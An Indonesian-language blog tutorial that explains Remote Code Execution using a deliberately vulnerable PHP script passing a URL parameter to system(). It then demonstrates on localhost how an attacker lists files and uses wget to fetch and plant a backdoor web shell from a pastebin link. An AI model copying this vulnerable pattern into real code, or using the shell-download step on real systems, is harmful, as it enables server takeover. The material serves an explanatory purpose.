Apa itu Remote Code Execution? 2019 dan Bagaimana Remote Code Execution itu bekerja?
SEHATMANG - Halo, Anda belum memperbarui artikel blog untuk waktu yang lama karena Anda meninggalkannya untuk meluangkan waktu untuk membawanya dalam kegiatan lain hehe, Kali ini saya akan membahas metode yang disebut Remote Code Execution atau biasa disebut RCE.
Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.
Remote Code Execution adalah bug di mana penyerang memiliki kemampuan untuk mengeksekusi perintah pada komputer target, biasanya menggunakan kelemahan dari aplikasi exploit target, yang memungkinkan penyerang untuk mengeksekusi command2 jarak jauh melalui url. Bug ini biasanya ditemukan di aplikasi yang menggunakan cgi.
Ini melakukan fungsi yang berhubungan dengan sistem.
Di sini saya mengunggah skrip Eksekusi Kode Jarak Jauh ke localhost bernama tools.php sebagai contoh target dan saya akan berlatih bagaimana Penyerang mengeksekusi Eksekusi Kode Jarak Jauh pada sistem
Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.
- Apa itu Remote Code Execution?
Remote Code Execution adalah bug di mana penyerang memiliki kemampuan untuk mengeksekusi perintah pada komputer target, biasanya menggunakan kelemahan dari aplikasi exploit target, yang memungkinkan penyerang untuk mengeksekusi command2 jarak jauh melalui url. Bug ini biasanya ditemukan di aplikasi yang menggunakan cgi.
- Bagaimana Remote Code Execution itu bekerja?
Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>Skrip di atas adalah contoh skrip yang rentan di PHP, apakah sesederhana tata letak skrip untuk eksekusi kode eksternal? yap masalahnya adalah sistem ($ command),
Ini melakukan fungsi yang berhubungan dengan sistem.
Di sini saya mengunggah skrip Eksekusi Kode Jarak Jauh ke localhost bernama tools.php sebagai contoh target dan saya akan berlatih bagaimana Penyerang mengeksekusi Eksekusi Kode Jarak Jauh pada sistem
- Saya membuka link http://localhost:8888/tools.php ( contoh target )
- Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
- Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
- lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)
Hingga saat ini artikel ini dapat bermanfaat bagi semua orang dan jika ada kesalahan dalam menulis artikel ini, harap pahami ini karena sebagai penulis saya masih belajar.
Minta artikel / Memperbaiki kesalahan dalam artikel? masukkan kolom dengan komentar.
Minta artikel / Memperbaiki kesalahan dalam artikel? masukkan kolom dengan komentar.
Open Comments
Close Comments
Post a Comment for "Apa itu Remote Code Execution? 2019 dan Bagaimana Remote Code Execution itu bekerja?"